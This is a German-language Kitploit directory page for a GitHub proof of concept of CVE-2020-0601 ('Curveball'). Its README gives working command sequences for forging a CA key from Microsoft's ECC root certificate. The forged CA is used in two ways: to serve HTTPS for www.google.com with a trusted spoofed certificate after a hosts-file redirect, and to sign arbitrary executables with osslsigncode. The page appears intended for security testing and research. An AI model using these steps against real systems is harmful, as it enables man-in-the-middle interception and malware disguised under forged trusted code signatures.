Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-0601_PoC — Demonstration von CVE-2020-0601, auch bekannt als Curveball. Basiert auf den PoCs unter https://github.com/kudelskisecurity/chainoffools und https://github.com/ly4k/CurveBall. | Kitploit
Tools/GitHubGitHub/joelbts/cve-2020-0601_poc
SchwachstellenanalyseCode-AnalyseExploitationWebsicherheitKryptographiePenetrationstests
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

Demonstration von CVE-2020-0601, auch bekannt als Curveball. Basiert auf den PoCs unter https://github.com/kudelskisecurity/chainoffools und https://github.com/ly4k/CurveBall.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Basierend auf POCs https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


ANFORDERUNGEN/VERWENDETE SOFTWARE


python version 3.11 openssl version 3.1 osslsigncode version 2.5 python libraries in gen-key.py httpServer.py


TLS-ZERTIFIKATSSIGNIERUNG


Erstelle einen gefälschten CA-Schlüssel aus dem vertrauenswürdigen Root-Zertifikat (muss secp384r1 und im PEM-Format sein)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Erstelle eine gefälschte CA mit dem gefälschten Schlüssel

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

Erstelle ein weiteres SSL-Zertifikat (beliebiger Art), das von der gefälschten CA signiert wird

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Erstelle eine Zertifikatsignierungsanfrage für das Zertifikat

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

Signiere den CSR mit dem gefälschten CA-Zertifikat

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

Starte einen HTTPS-Server mit der gefälschten Zertifikatskette

python httpServer.py

AUF WINDOWS-MASCHINE

Füge <kali.machine.ip> www.google.com zur hosts-Datei hinzu (leitet google zum Server um)

Besuche HTTPS://www.google.com

Das Zertifikat sollte vertrauenswürdig sein, und 'Hello World' sollte angezeigt werden

Wenn ein Fehler auftritt, überprüfe die Systemzeit auf Korrektheit


CODESIGNIERUNG


Erstelle einen gefälschten CA-Schlüssel aus dem vertrauenswürdigen Root-Zertifikat (muss secp384r1 und im PEM-Format sein)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Erstelle eine gefälschte CA mit dem gefälschten Schlüssel

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

Erstelle einen neuen Schlüssel, der für Codesignierung verwendet werden kann

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Erstelle eine Zertifikatsignierungsanfrage mit dem Schlüssel, die wir signieren können

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

Signiere den CSR mit der gefälschten CA

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

Verpacke den Schlüssel, das Zertifikat und die gefälschte CA in eine PKCS12-Datei zum Signieren von EXEs

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

Verwende die PKCS12-Datei, um eine ausführbare Datei zu signieren

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

Tool herunterladen